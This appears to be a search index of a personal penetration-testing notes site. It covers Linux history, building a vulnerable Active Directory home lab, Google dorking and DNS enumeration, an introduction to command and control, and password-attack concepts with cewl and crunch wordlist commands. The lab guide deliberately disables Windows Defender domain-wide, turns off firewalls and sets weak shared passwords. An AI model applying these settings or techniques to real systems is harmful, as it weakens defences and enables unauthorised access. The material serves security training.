[{"content":" Note In 1984 Richard Stallman, an American software engineer, had a goal to create a completely free UNIX-compatible open-source (non-proprietary) operating system. The initiative was called the GNU Project (GNU’s Not Unix) and by 1991. Then Linus Torvalds developed a kernel and proclaimed it\u0026rsquo;s availability.\nBasically Linux is not an OS, it\u0026rsquo;s a open-source kernel. Here\u0026rsquo;s a basic diagram that will give a brief idea about the evolution of linux: timeline title History of Linux: Major Milestones 1991 : Linus Torvalds announces personal project on Usenet : First Linux Kernel release (0.01) 1992 : Relicensed under GPLv2 (Open Source) : First distributions (SLS, MCC Interim Linux) 1993 : Slackware Linux released : Debian Project founded by Ian Murdock 1994 : Linux Kernel 1.0 released : Red Hat Commercial Linux founded : S.u.S.E. Linux founded 1996 : Linux Kernel 2.0 released (Symmetric Multiprocessing support) : Tux the Penguin adopted as mascot 1998 : KDE 1.0 released : Major corporations (Oracle, Sun) announce support 1999 : GNOME 1.0 released : Red Hat goes public 2004 : Ubuntu 4.10 (Warty Warthog) released 2007 : Android (built on Linux kernel) announced 2011 : Linux Kernel 3.0 released 2015 : Linux Kernel 4.0 released 2019 : Linux Kernel 5.0 released 2022 : Linux Kernel 6.0 released There are several distros available which uses the linux kernel as their base and it\u0026rsquo;s a picture i found on the web that demonstrates the evolution of distros pretty well[CURRENTLY THE PROJECT IS NOT MAINTAINED ANYMORE] -\u0026gt; DISTRO-EVOLUTION ","permalink":"https://0x-s0M3n4th.github.io/notes/system_administration/00-chapter-1/00-history-of-linux/","summary":"\u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eIn 1984 Richard Stallman, an American software engineer, had a goal to create a completely free UNIX-compatible open-source (non-proprietary) operating system. The initiative was called the GNU Project (GNU’s Not Unix) and by 1991.\nThen Linus Torvalds developed a kernel and proclaimed it\u0026rsquo;s availability.\u003c/p\u003e","title":"History of linux"},{"content":"Requirements: Kali linux Vmware workstation pro Windows 10 workstation windows server 2022 Metasploitable Linux 2 Linux mint(optional) You should have basic knowledge of setting up vms inside vmware, plus feel free to ommit any machine as your system needs. Vmware workstation pro: Install by signing up from this site VMWARE Kali linux: Install kali linux from this site KALI Linux Note Install prebuilt vm images for vmware\nLinux mint(optional): We will be using this distro for setting up basic blue team operations regarding detection of the attacks. It\u0026rsquo;s an optional setup. If you have limited resources skip this. Install linux mint from this site LINUX MINT , install the xfce edition for lightweight usage. Metasploitable-2-linux: Install from this site Metasploitable-2-linux windows 10 enterprise iso: Install from this site Win 10 (link not working), i will provide a drive link later on ;)) You can use any windows workstation for testing!! Windows server 2022 iso: Install from this site WINDOWS SERVER 2022 You can use any windows server for testing. Network segmentation inside vmware: We will be making 5 different folders for our homelab inside vmware. First one which will be ATTACK-BOX: inside this kali linux will be present. Second one will be PENTEST-NET: inside this metasploitable-2-linux will be present. Third one will be PIVOT-NET: inside this 2 windows 10 workstations(name them THEPUNISHER, SPIDERMAN) will be present. Fourth one will be SECURE-NET: inside this windows server 2022 will be present. Fifth one will be DETECTION-NET: inside this our linux mint machine will be present. You can make the folders by right clicking onto the empty space on vmware -\u0026gt; by selecting New folder option. Now after making and separating the machines, we need to segment the network. To do so follow the next steps: Open vmware -\u0026gt; click on Edit -\u0026gt; then virtual network editor You should see two network named NAT and another would be your host only connection. We will add 2 more subnets click on change settings -\u0026gt; click on Add network -\u0026gt; select your preferred vmnet and click add After adding we need to change some subnet settings on the left down corner. Follow the screenshots to give the same as mine: Important If you don\u0026rsquo;t want to segment the network and make the lab with only NAT network, you can do so, for simpler setup use NAT(if inexperienced). For this whole Network pentesting guide i am going to use kali on 3 of the vmnets for ease of the audience.\nNow click on Apply Then come to vmware -\u0026gt; click on kali linux -\u0026gt; edit virtual machine -\u0026gt; add 2 extra network adapters by clicking on the add button and selecting Network adapter. After that add your kali machine into vmnet2 , vmnet3 (according to my subnet naming) Then come to your Linux mint machine do the same as kali Add your metasploitable 2 linux machine into vmnet2 only. For the NAT only setup you will add metasploitable 2 in NAT . Network segmentation summary: All devices in NAT: Just normal default importing of all the vms in vmware. Kali is on NAT, vmnet2 and vmnet3, used linux mint as a router for pivoting through machines inside the network segment so that all of the workstations under the forest can talk to each other: Later on for advanced level pivoting i will show how we can make the following type of network, where kali will be only on NAT with some added changes: Feel free to use any of the architecture, but i would suggest you to make the first one for easy setup and rapid exploitation wihtout network failures plus less resources consumed. If you want to actually feel like more of a real world scenario use the second one.\nNote I will be using the second one for this whole Network pentesting tutorial.For some practicals i have added new vulnerable machines which i will be providing later on throughout the course. Sometimes i have also used a different Domain controller like windows server 2019 for demo purposes, you can do all these works inside your own DC which we will be setting up.\nActive Directory LAB setup: We will first setup the Domain controller Setting up the Domain controller: Come to your windows server 2022 -\u0026gt; Add it into vmnet3 along with NAT in case of internet related tasks like installations. Boot your windows server -\u0026gt; make sure you are at this stage: Click on next -\u0026gt; Install Now You should see a page like this : Click on windows server 2022 standard evaluation(Desktop Experience) -\u0026gt; then hit next Check the box -\u0026gt; hit next Once you are at this page: Click on custom install Then on this page hit New -\u0026gt; Apply Hit ok on the warning Click next again on this page: Now let it install. After that you will come to this page: Give the password P@$$w0rd! Now login using the creds. Install vmware tools -\u0026gt; click vm -\u0026gt; Install vmware tools -\u0026gt; open cmd -\u0026gt; run the command D:\\setup.exe -\u0026gt; After installing a complete vmware tools using the popped up wizard -\u0026gt; restart Now we need to rename our windows server -\u0026gt; press on the windows button -\u0026gt; type name -\u0026gt; Then click on this option: After that click on Rename PC We will be building this Lab as a MARVEL theme, so i gave the name HYDRA-DC -\u0026gt; then restart again. Login again Now we will actually start setting our windows server as Domain controller. Onto server manager -\u0026gt; Click on the Manage button -\u0026gt; Click Add roles and features A wizard will pop up, click 3 times next. On selection of Server Roles , select Active Directory Domain Services . This will allow us to have our domain. Hit Add features on the next pop up. Then click 3 times next again on the options given. After coming to this page Check this option: Then hit install . After installation click on this option: A new wizard will pop up, click on these options, and give this domain name{you can give your unique domain name, but make sure you have added .local at the end of the name}: Hit next -\u0026gt; Give the same admin password into this page also: Hit next 2 times including the previous step. Populated the NetBIOS domain name successfully: Hit next again. Our pathways: What is SYSVOL: SYSVOL is a shared folder on each domain controller (DC) in a Windows Server Active Directory (AD) domain that stores critical files for common access and replication across the domain. It contains a copy of Group Policy Objects (GPOs) and scripts, such as logon and startup scripts, which are essential for applying policies to member computers\nWhat is NTDS: NTDS, or NT Directory Services, is the underlying technology and database that powers Microsoft\u0026rsquo;s Active Directory (AD). It is responsible for storing and managing all the information about network resources, such as user accounts, computer objects, groups, and security identifiers (SIDs). The physical database file is named ntds.dit (Directory Information Tree) and is stored by default in the %SystemRoot%\\NTDS folder on every domain controller.\nHit next again 2 times including this pathways page. You should see a prerequisite check running, and after some time it should say successful -\u0026gt; then hit install Then on installation it should give a pop up like this -\u0026gt; click close You DC will be automatically restarted and bring you to the login screen. Login . We will now install another feature called ADCS(active direcotry Certificate Services) , this allows us to use LDAPS on our DC , and manages certificates for authentication purposes. Again on server manager -\u0026gt; click manage -\u0026gt; add roles and features -\u0026gt; 3 times next -\u0026gt; Select ADCS -\u0026gt; add features -\u0026gt; 4 times next -\u0026gt; Check the restart box -\u0026gt; hit install Then after installation -\u0026gt; click on this option: Hit next on the first option. Check the box of Certificate auhority and hit next Hit 5 times next again -\u0026gt; change the validity option to 99 years Hit next and come to this page then click configure Restart again after the completion. Setting up the windows 10 machines: Boot up both the windows 10 machine now, i removed previous machines containing windows 10 enterprise iso .This time i am having normal windows 10 iso , so we will be using windows 10 education . Remember while adding the vm you gave username and password , in my case then only the following pages came up. Then setup the basic requirements on both the machines Use the option domain joined instead , rather than using online accounts. 4. Name THEPUNISHER vm\u0026rsquo;s user as frankcastle with password Password1 , and SPIDERMAN vm\u0026rsquo;s user as peterparker with password Password1 `` 5. Select the security questions and answer them as bob for every single one of them in both the machines. 6. Turn off all the privacy settings, we don\u0026rsquo;t want to send any data to Microsoft 7. Don\u0026rsquo;t accept crotana 8. After doing the complete setup , it will automatically boot up the machines, then rename these two machines as THEPUNISHER, SPIDERMAN respectively . Then restart again. Setting up GPO(Groups, Policies and Users): Open up the Domain controller\nOn server manager -\u0026gt; Click on tools -\u0026gt; Active Directory users and computers\nThis page should load up: Separating the groups from users: Give the name as Groups\nGrab all the groups from the users tab and move them to Groups except Administrator and Guest user. Making Domain admin:\nRight click on the Administrator user -\u0026gt; Copy -\u0026gt; Fill the following information Give the password as : Password12345! Click next and hit finish Making a service account which will be our another Domain admin :\nAgain copy from the Administrator account and use the following info: Give the password as MYpassword123# Then do this step: Making some low level users which will part of our Domain users group:\nUse the following steps to open the wizard: Add the frank castle user: Use the following checkboxes, and give the same password of frankcastle which is Password1 Add peterparker using the following steps: We will give here his password as Password2 All users: SETTING UP FILESHARE:\nCome to server manager -\u0026gt; Click on Files and storage services Click on Shares -\u0026gt; Tasks -\u0026gt; New share -\u0026gt; SMB share quick -\u0026gt; click next -\u0026gt; Click next again -\u0026gt; give the share name as hackme -\u0026gt; click 2 times next -\u0026gt; hit create\nSetting up the service account(SQL Service):\nOpen command prompt as administrator use the following command: setspn -a HYDRA-DC/SQLService.MARVEL.local:60111 MARVEL\\SQLService 3. Verifying the changes using the following command by querying:\nsetspn -T MARVEL.local -Q */* At the end of the command\u0026rsquo;s output we should see this result: Setting up a group policy:\nOn the start menu type group Use the following options to create a new GPO: Give this name: Our motive is to disable the windows defender accross the whole domain , as we are not going to perform any modern defender evasion techniques. Use the following steps for editing the GPO: Come to this column: Find Microsoft Defender Antivirus -\u0026gt; and double click on this turn off option: A wizard should pop up -\u0026gt; click on enabled -\u0026gt; apply -\u0026gt; click ok Then again come back to the GPO management tab -\u0026gt; right click -\u0026gt; click enforced Then give the DC a static IP from the adapter settings, used linux mint as the DNS server: I have used linux mint as the gateway, if you are not using any intermediate os for acting as a router, don\u0026rsquo;t give any gateway(as no default gateway exists inside vmnet\u0026rsquo;s host only networks, in case if you are using the network segmentation). If you are using the NAT only setup give your NAT's default gateway. You can identify your NAT's default gateway through Virtual Network Editor -\u0026gt; Change settings -\u0026gt; select the NAT network -\u0026gt; NAT settings.\nNote Don\u0026rsquo;t get fooled by my lab result\u0026rsquo;s IP addresses. Your lab will be having different setup of IPs as well as NICs. Understand those carefully and then add accordingly throughout the lab setup as well as on practical demos.\nSetting up Linux mint as an intermediate router(optional): For the advance lab setup\nSet up static IP for both wired connection 2 and 3 in linux mint: ENABLING IP FORWARDING:\n# Turn on forwarding immediately sudo sysctl -w net.ipv4.ip_forward=1 # Make it permanent (so it survives a reboot) echo \u0026#34;net.ipv4.ip_forward=1\u0026#34; | sudo tee -a /etc/sysctl.conf FIXING THE FIREWALL BY ALLOWING ROUTING: Allow traffic from vmnet2 to go to vmnet3: sudo ufw route allow in on ens34 out on ens35 Allow traffic from vmnet3 to go to vmnet2: sudo ufw route allow in on ens35 out on ens34 Joining the Machines to the Domain controller: Pointing those machines to our Domain controller: If you have followed the linux mint one this one is for you: Our motive is to point SPIDERMAN to route it\u0026rsquo;s traffic to linux mint to Domain controller and vise versa. To do so use the following settings in your vmnet 2 adapter on SPIDERMAN: Onto THEPUNISHER machine use the following settings for vmnet 2: Settings for vmnet 3 on THEPUNISHER machine: If you are doing the NAT only setup: Give the default gateway of your NAT network for both of the machine. Give the Domain controller's IP as DNS for both the machine. Testing the connections: Ping SPIDERMAN to Linux mint , then SPIDERMAN to THEPUNISHER Ping THEPUNISHER to linu mint and then to SPIDERMAN Ping Domain controller from Spiderman and THEPUNISHER machine both and vise versa. If you face request timeout issue, turn off windows firewall fully on both the PUNISHER and SPIDERMAN machine. Then try again. Joining the domain from THEPUNISHER machine: Click on the start button -\u0026gt; type Domain and access this option: Click on connect -\u0026gt; and click on join this device to a local AD domain Give your local domain name and hit next: If this windows loads up that\u0026rsquo;s mean your lab setup is successful: Give username as administrator and password as P@$$w0rd! Then on this pop up, select account type as Administrator Joining domain for SPIDERMAN machine: Do the exact same stuff we did for THEPUNISHER machine. Let those machines reboot, come to the DC -\u0026gt; server manager -\u0026gt; Active Directory users and computers -\u0026gt; Under your local domain -\u0026gt; select Computers . You should see your two Windows 10 workstations Now login onto both the workstations as MARVEL\\administrator using the DC's admin password which is P@$$w0rd! Now adding local admins inside THEPUNISHER machine: click on the start button -\u0026gt; type users and go to the settings Edit local groups and users: or you can press win + r and type lusrmgr.msc Come to the users tab -\u0026gt; right click on Administrator -\u0026gt; then set a password -\u0026gt; give this password Password1! Enable this account by double clicking it -\u0026gt; and disabling the checkbox telling Account is disabled Adding fcastle which we made inside the DC inside THEPUNISHER machine\u0026rsquo;s Administrator groups: Click on Add -\u0026gt; type fcastle -\u0026gt; click on check names and this should appear: Hit apply and ok Then enable Network discovery by going into the network folder Adding local admins inside SPIDERMAN machine: Do the same steps as THEPUNISHER's step number 4 Then add 2 accounts into the administrators group using the following steps: Write pparker and click check names add fcastle the same way we did it inside THEPUNISHER Now peterparker and frankcastle both as local admins inside SPIDERMAN machine Enable network sharing by clicking the option click to change -\u0026gt; turn on network discovery and file sharing Restart your computer and login as peterparker like this: Now we will map the network drive Follow these steps: Type \\\\HYDRA-DC\\hackme and check both the boxes: Use the domain admin credentials administrator and P@$$w0rd! Now we should access the shared drive: CONGRATS WE HAVE COMPLETED THE LAB SETUP !! Let\u0026rsquo;s start hacking.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/01-lab-build/01-easy-to-setup-lab/","summary":"\u003ch2 id=\"requirements\"\u003eRequirements:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eKali linux\u003c/li\u003e\n\u003cli\u003eVmware workstation pro\u003c/li\u003e\n\u003cli\u003eWindows 10 workstation\u003c/li\u003e\n\u003cli\u003ewindows server 2022\u003c/li\u003e\n\u003cli\u003eMetasploitable Linux 2\u003c/li\u003e\n\u003cli\u003eLinux mint(optional)\n\u003cem\u003eYou should have basic knowledge of setting up vms inside vmware, plus feel free to ommit any machine as your system needs.\u003c/em\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch3 id=\"vmware-workstation-pro\"\u003eVmware workstation pro:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInstall by signing up from this site \u003ca href=\"https://www.vmware.com/products/desktop-hypervisor/workstation-and-fusion\"\u003eVMWARE\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch3 id=\"kali-linux\"\u003eKali linux:\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInstall kali linux from this site \u003ca href=\"https://kali.org\"\u003eKALI Linux\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition note\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 576 512\"\u003e\u003cpath d=\"M0 64C0 28.7 28.7 0 64 0L224 0l0 128c0 17.7 14.3 32 32 32l128 0 0 125.7-86.8 86.8c-10.3 10.3-17.5 23.1-21 37.2l-18.7 74.9c-2.3 9.2-1.8 18.8 1.3 27.5L64 512c-35.3 0-64-28.7-64-64L0 64zm384 64l-128 0L256 0 384 128zM549.8 235.7l14.4 14.4c15.6 15.6 15.6 40.9 0 56.6l-29.4 29.4-71-71 29.4-29.4c15.6-15.6 40.9-15.6 56.6 0zM311.9 417L441.1 287.8l71 71L382.9 487.9c-4.1 4.1-9.2 7-14.9 8.4l-60.1 15c-5.5 1.4-11.2-.2-15.2-4.2s-5.6-9.7-4.2-15.2l15-60.1c1.4-5.6 4.3-10.8 8.4-14.9z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eNote\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eInstall prebuilt vm images for vmware\u003c/p\u003e","title":"Easy home lab setup guide"},{"content":" site:microsoft.com -\u0026gt; To view specific results that only contain the target domain name. Imagine that you are looking for search results that contain a keyword but only from the target domain. Here, you can use the keyword site:domain.com If you want to filter your search results so that they include two specific keywords, you can use the keyword1 AND keyword2 site:domain.com syntax We can also use the OR syntax. To filter the search results to display a specific file type from a target domain, use the site:domain.com filetype:file type syntax To discover specific URLs that contain a specific keyword within their page title, use the site:domain.com intitle:keyword syntax To remove the display results of URLs for a target domain that does not include a specific keyword, use the site:domain.com –keyword syntax Tip You can use the intext: syntax with a keyword to search for a specific web page that contains the keyword within its text/body. Using inurl: with a keyword allows you to filter URLs that contain the specific keywords within its URL, which may lead to a potentially sensitive directory in a company\u0026rsquo;s domain.\nWe can also head over to the home page of google by typing google.com , on the right lower corner click on settings \u0026gt; advanced search After filling the necessary details and clicking on advanced search button, google will automatically search for you. While there are so many possibilities when using Google search operators, it can be a bit overwhelming. Google Hacking Database (GHDB) is maintained by the creators of Kali Linux, Offensive Security (https://www.offensive-security.com), and can be found at https://www.exploit-db.com/google-hacking-database. This website contains a list of various Google dorks (search operators), which are used to find very sensitive information on the internet using Google Search. DNS reconnaissance: A DNS server is like a traditional telephone directory, with a list of people and their telephone numbers. On a DNS server, you can find records of the hostnames of people, as well as their associated IP addresses, which are similar to telephone numbers. There are many public DNS servers on the internet; some are created by threat actors with malicious intentions, such as redirecting unaware users to malicious websites. As a result, I recommend using a trusted DNS provider on all of your networking devices and computers to improve your online safety. The following are some popular DNS servers on the internet: • Cloudflare DNS: https://1.1.1.1/ • Quad 9 DNS: https://www.quad9.net/ • Cisco OpenDNS: https://www.opendns.com/ • Google Public DNS: https://developers.google.com/speed/public-dns\nDNS record types: • A: Resolves a hostname to an IPv4 address.\n• AAAA: Resolves a hostname to an IPv6 address.\n• NS: Contains the name servers\u0026rsquo; information.\n• MX: Contains the mail exchange (email) servers.\n• PTR: Resolves an IP address to a hostname.\n• CNAME: Provides a canonical name or an alias.\n• RP: Specifies the person that\u0026rsquo;s responsible for the domain.\n• SOA: Contains information about the administrator of the domain.\n• SRV: Contains a service port number for a specific service of the domain.\nAs an aspiring penetration tester, DNS enumeration is the technique of probing specific DNS records for a specific organization\u0026rsquo;s domain. In other words, you ask a DNS server about the IP addresses and server names for a target organization. Simply put, you can retrieve both the hostname and the IP addresses of a target\u0026rsquo;s public servers, such as their email servers. We can also perform DNS zone trasnfer to see misconfigurations on the DNS server or whether it leaks sensitive information.\nDNS enumeration: dnsrecon dnsrecon -d microsoft.com : -d option will take the Domain name. DNS zone transfer misconfigurations using zonetransfer.me Dnsenum: OSINT automation: Spiderfoot is a very popular OSINT tool that can help penetration testers automate their processes and workloads when gathering intelligence about their targets. This tool provides excellent visualization of the all data it has gathered in the form of graphs and tables, which helps you easily read and intercept the data that\u0026rsquo;s been collected.\nUsing spiderfoot:\nIdentify your IP address. Then run this command: sudo spiderfoot -l your_ip:80 , if any service is running on port 80 already in your system, just change the port number on the spiderfoot command as your choice. Now click on settings button Spiderfoot can gather information from a wide range of online sources. However, some of these sources will require an Application Programming Interface (API) key to allow Spiderfoot to perform queries on some sources. The sources that require an API key are indicated with a lock icon next to their names Keep in mind that Spiderfoot works better when the API keys have been configured within its Settings menu. Many of these OSINT sources provide an API key if you register for a free account on their website. Do take the time to register on a couple of these online sources/websites and simply insert your unique API key into the Spiderfoot Settings menu. Now let\u0026rsquo;s start scanning, follow the options -\u0026gt; new scan -\u0026gt; give name and target and then select footprint -\u0026gt; Run scan now Now as the scan is running click on graph This will show all the connections. Next, to view the data that was collected based on categories, click on Browse Click on any data RAW DNS records: Browse -\u0026gt; Raw dns records ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/00-google-dorking--dns-enumeration/","summary":"\u003col\u003e\n\u003cli\u003e\u003ccode\u003esite:microsoft.com\u003c/code\u003e -\u0026gt; To view specific results that only contain the target domain name.\u003c/li\u003e\n\u003cli\u003eImagine that you are looking for search results that contain a keyword but only from the target domain. Here, you can use the \u003ccode\u003ekeyword site:domain.com\u003c/code\u003e\n\u003cimg alt=\"dns_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eIf you want to filter your search results so that they include two specific keywords, you can use the \u003ccode\u003ekeyword1 AND keyword2 site:domain.com\u003c/code\u003e syntax\n\u003cimg alt=\"dns_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eWe can also use the \u003ccode\u003eOR\u003c/code\u003e syntax.\u003c/li\u003e\n\u003cli\u003eTo filter the search results to display a specific file type from a target domain, use the \u003ccode\u003esite:domain.com filetype:file type\u003c/code\u003e syntax\n\u003cimg alt=\"dns_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eTo discover specific URLs that contain a specific keyword within their page title, use the \u003ccode\u003esite:domain.com intitle:keyword\u003c/code\u003e syntax\n\u003cimg alt=\"dns_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_4.png\"\u003e\u003c/li\u003e\n\u003cli\u003eTo remove the display results of URLs for a target domain that does not include a specific keyword, use the \u003ccode\u003esite:domain.com –keyword\u003c/code\u003e syntax\n\u003cimg alt=\"dns_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/00/dns_5.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\n            \u003clink rel=\"stylesheet\" href=\"/css/vendors/admonitions.4fd9a0b8ec8899f2ca952048d255a569f433f77dfb3f52f5bc87e7d65cdce449.css\" integrity=\"sha256-T9mguOyImfLKlSBI0lWlafQz9337P1L1vIfn1lzc5Ek=\" crossorigin=\"anonymous\"\u003e\n    \u003cdiv class=\"admonition tip\"\u003e\n      \u003cdiv class=\"admonition-header\"\u003e\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 384 512\"\u003e\u003cpath d=\"M272 384c9.6-31.9 29.5-59.1 49.2-86.2c0 0 0 0 0 0c5.2-7.1 10.4-14.2 15.4-21.4c19.8-28.5 31.4-63 31.4-100.3C368 78.8 289.2 0 192 0S16 78.8 16 176c0 37.3 11.6 71.9 31.4 100.3c5 7.2 10.2 14.3 15.4 21.4c0 0 0 0 0 0c19.8 27.1 39.7 54.4 49.2 86.2l160 0zM192 512c44.2 0 80-35.8 80-80l0-16-160 0 0 16c0 44.2 35.8 80 80 80zM112 176c0 8.8-7.2 16-16 16s-16-7.2-16-16c0-61.9 50.1-112 112-112c8.8 0 16 7.2 16 16s-7.2 16-16 16c-44.2 0-80 35.8-80 80z\"/\u003e\u003c/svg\u003e\n        \u003cspan\u003eTip\u003c/span\u003e\n      \u003c/div\u003e\n      \u003cdiv class=\"admonition-content\"\u003e\n        \u003cp\u003eYou can use the intext: syntax with a keyword to search for a specific web page that contains the keyword within its text/body. Using inurl: with a keyword allows you to filter URLs that contain the specific keywords within its URL, which may lead to a potentially sensitive directory in a company\u0026rsquo;s domain.\u003c/p\u003e","title":"Google Dorking \u0026 DNS Enumeration"},{"content":"This chapter focuses on the Command and Control (C2) stage of the Cyber Kill Chain, which then leads to the threat actor completing the Actions on Objective phase of the cyber-attack. As an aspiring penetration tester, it is essential to understand the fundamentals of performing C2 operations from a threat actor’s perspective. This technique also helps penetration testers determine whether their clients’ security solutions are sufficient to detect a real-world cyber-attack and stop a threat actor’s C2 operation.\nIn this section we are going to cover the following topics:\nUnderstanding C2 Setting up C2 operations Post-exploitation using Empire Working with starkiller. ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/09-command-and-control-tactics/00-intro/","summary":"\u003cp\u003eThis chapter focuses on the \u003ccode\u003eCommand and Control (C2)\u003c/code\u003e stage of the \u003ccode\u003eCyber Kill Chain\u003c/code\u003e, which then leads to the threat actor completing the Actions on Objective phase of the cyber-attack. As an aspiring penetration tester, it is essential to understand the fundamentals of performing C2 operations from a threat actor’s perspective. This technique also helps penetration testers determine whether their clients’ security solutions are sufficient to detect a real-world cyber-attack and stop a threat actor’s C2 operation.\u003c/p\u003e","title":"Introduction to Command and Control"},{"content":" In this chapter, we will cover the following topics: • Exploring password-based attacks • Performing host discovery • Identifying and exploiting vulnerable services Password based attacks: OBJECTIVES:\nGaining unauthorized access to remote hosts on a network by performing attacks against its authentication system Retrieving the password associated with cryptographic hashes Retrieving the password to access a password-protected sensitive file Different types of password attacks: Brute-force attack: In a brute-force attack, every possible combination is tried against the system. This is a very time-consuming process as every possible password combination is tested against the authentication system of the target until the valid password is retrieved. While this method may seem to be the best method, the time constraints given for completing a penetration test are often not achievable. Dictionary attack: In a dictionary attack, the threat actor uses a pre-populated wordlist that contains thousands or even millions of candidate passwords. These are tested against the authentication system of the target. Each word from the wordlist is tested; however, the attack will not be successful if a valid password is not found within the wordlist being used by the threat actor. Password guessing: This is a common technique that’s used by many people, even threat actors and penetration testers, who are attempting to gain unauthorized access to a system. I have often seen IT professionals use simple and even default passwords on their networking devices, security appliances, and even the client and server systems within their organization. For instance, by performing a Google dork using common default passwords, you will easily find default passwords for various systems. These default passwords are set by the manufacturer of the device. Password cracking: In this technique, the threat actor uses various tools and techniques to retrieve valid user credentials to gain unauthorized access to a system. Sometimes, a threat actor may capture a user’s password in transit across a network in plaintext by an unsecure network protocol, or even retrieve the cryptographic hash of a password. Password spraying: This is the technique where a threat actor uses a single password and tests it against an authentication system with different usernames. The password is a guessable password, obtained from data breaches or a wordlist. The idea is to test which user account within a specific list uses the same password. This technique is good when testing which users Credential stuffing: This technique allows a threat actor to use a common wordlist of usernames and passwords against the authentication system of a target host. This technique checks which combination of usernames and passwords leads to valid user credentials. Online password attack: In an online password attack, the threat actor attempts to gain unauthorized access to a host that is running a network service or a remote access service. This allows authorized users to log in to the system across a network. A simple example of an online password attack is a threat actor attempting to retrieve the username and password of a valid user to gain access to a server that is running the Remote Desktop Protocol (RDP). Keep in mind that online password attacks focus on using a combination of passwords from a wordlist directly on a web login page or network service interface until the correct one is found. Offline password attack: In an offline password attack, the threat actor uses various tools and techniques to retrieve the valid password of a password-protected file, such as a document, or even the cryptographic hash of a user’s password. A simple example of this is capturing a domain administrator’s username and password hash from network packets. The username is usually in plaintext but you may need/want to retrieve the password from the hash value. Important SecLists is a collection of pre-built wordlists containing passwords and usernames that are commonly used by penetration testers to perform both online and offline dictionary attacks. Furthermore, SecLists contains URLs, sensitive data patterns, and fuzzing payloads, which are valuable to penetration testers. You can find the SecLists collections at https://github.com/danielmiessler/SecLists. Additionally, you can use the wordlists command within Kali Linux to view the local wordlist repository that is already pre-loaded within the operating system\nCreating a keyword-based wordlist: Sometimes, web developers and IT professionals set passwords within their organizations and online web applications that are somewhat related to the organization’s goals, mission, products, and services. Custom Wordlist Generator (CeWL) is a password generator tool that enables penetration testers to perform web crawling (spidering) of a website and gather keywords to create a custom wordlist to perform dictionary-based password attacks against a system or file Let\u0026rsquo;s create a custom wordlist: cewl example.com -m 6 -w output_wordlist.txt This command will generate a custom wordlist containing words with a minimum length of 6 characters using keywords from the website example.com. It will then output the results in the wordlist. txt file\nGenerating a custom wordlist using crunch: Crunch is an offline password generator that enables penetration testers to create custom wordlists to perform dictionary-based password attacks. Let\u0026rsquo;s generate: # options sample crunch \u0026lt;min-length\u0026gt; \u0026lt;max-length\u0026gt; [options] –o output_file.txt To create a custom wordlist with a fixed length of 4 characters, which can be a combination of characters from 0 to 9 and A to C follow the command: crunch 4 4 0123456789ABC -o output_file_2.txt Crunch created 28,561 possible combinations of passwords.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/00-intro/","summary":"\u003cul\u003e\n\u003cli\u003eIn this chapter, we will cover the following topics:\n• Exploring password-based attacks\n• Performing host discovery\n• Identifying and exploiting vulnerable services\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"password-based-attacks\"\u003ePassword based 